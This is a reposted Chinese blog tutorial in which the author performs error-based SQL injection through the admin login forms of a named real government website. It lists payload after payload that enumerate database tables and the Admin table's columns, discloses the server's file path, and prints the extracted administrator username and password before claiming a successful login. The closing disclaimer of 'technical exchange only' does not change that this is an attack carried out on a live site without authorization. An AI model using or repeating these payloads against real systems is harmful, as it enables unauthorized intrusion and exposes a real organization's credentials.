登陆框post注入教程

2019独角兽企业重金招聘Python工程师标准>>>

登陆框post注入http://www.kmxs.gov.cn/

1' and 1=convert(int,(select top 1 name from sysobjects where xtype='U')) and '1'='1

爆出网站的绝对路径：E:\wwwroot\NewXs\web\List.aspx

大家也可以从url中注入，不过我直接从登录口突破。

http://www.kmxs.gov.cn/Admin/Login.aspx

Copyright ? 2009-2010 www.865171.cn 普法管理

Server Error in '/' Application.

在应使用条件的上下文(在 'or' 附近)中指定了非布尔类型的表达式。

出现这个说明存在注入漏洞，因为已经将刚才的万能密码带入sql语句进行查询了。

1234567890  10个字符

刚才我写'1 and '1' ='1 写不进去，因为它限制了我的输入，只能输入10个字符。

那我换条路子走。

http://kmxs.gov.cn/kjj/Admin/申报管理后台帮助.html

http://kmxs.gov.cn/kjj/Admin/Admin_Login.aspx

“/kjj”应用程序中的服务器错误。
哈哈，报错了，我喜欢报错。。

在将 nvarchar 值 'sysdiagrams' 转换成数据类型 int 时失败。

这句话什么意思呢？我们刚才在用户名的那个文本框写的是：

1' and 1=convert(int,(select top 1 name from sysobjects where xtype='U')) and '1'='1

那么它是查询第一个用户表的名字，并且转化成Int类型，因为表名是nvarchar类型的，所以会报错。

sysdiagrams

但这个表名貌似对我们没什么太大的作用，我们先看看第2个表。

1' and 1=convert(int,(select top 1 name from sysobjects where xtype='U' and name not in('sysdiagrams'))) and '1'='1

Commonness

我们继续看第三个表：

1' and 1=convert(int,(select top 1 name from sysobjects where xtype='U' and name not in('sysdiagrams','Commonness'))) and '1'='1

Bargain

以此类推，我找了半天，才找到一个有用的表：

1' and 1=convert(int,(select top 1 name from sysobjects where xtype='U' and name not in ('sysdiagrams','Commonness','Bargain','ValidationReport','Examine','OpinionBook'))) and '1'='1

ProjectInformation

1' and 1=convert(int,(select top 1 name from sysobjects where xtype='U' and name not in ('sysdiagrams','Commonness','Bargain','ValidationReport','Examine','OpinionBook','ProjectInformation'))) and '1'='1

Company

1' and 1=convert(int,(select top 1 name from sysobjects where xtype='U' and name not in ('sysdiagrams','Commonness','Bargain','ValidationReport','Examine','OpinionBook','ProjectInformation','Company'))) and '1'='1

yinfu

1' and 1=convert(int,(select top 1 name from sysobjects where xtype='U' and name not in ('sysdiagrams','Commonness','Bargain','ValidationReport','Examine','OpinionBook','ProjectInformation','Company','yinfu'))) and '1'='1

NewsType

1' and 1=convert(int,(select top 1 name from sysobjects where xtype='U' and name not in ('sysdiagrams','Commonness','Bargain','ValidationReport','Examine','OpinionBook','ProjectInformation','Company','yinfu','NewsType'))) and '1'='1

AdminType

1' and 1=convert(int,(select top 1 name from sysobjects where xtype='U' and name not in ('sysdiagrams','Commonness','Bargain','ValidationReport','Examine','OpinionBook','ProjectInformation','Company','yinfu','NewsType','AdminType'))) and '1'='1

Admin
=======================================================
有个Admin表，那么我开始猜列：

1' and 1=convert(int,(select top 1 col_name(object_id ('Admin'),1) from Admin)) and '1'='1

ID

然后我们猜第二个，第三个：
1' and 1=convert(int,(select top 1 col_name(object_id ('Admin'),2) from Admin)) and '1'='1

LoginName

1' and 1=convert(int,(select top 1 col_name(object_id ('Admin'),3) from Admin)) and '1'='1

Passward

======================================================
好了，下面开始爆内容：
1' and 1=convert(int,(select top 1 LoginName from Admin)) and '1'='1

admin

1' and 1=convert(int,(select top 1 Passward from Admin)) and '1'='1

admin123

他娘的，坑爹啊！！！

=====================================================

OK，登录成功，政府站，不搞破坏，希望各位基友们不要恶意破坏这个站点。
此教程仅作技术交流。

并无恶意。。

bye~

MXi4oyu:QQ:798033502

 

原文链接： http://blog.csdn.net/mypc2010/article/details/7976959

转载于:https://my.oschina.net/changpinghu/blog/92550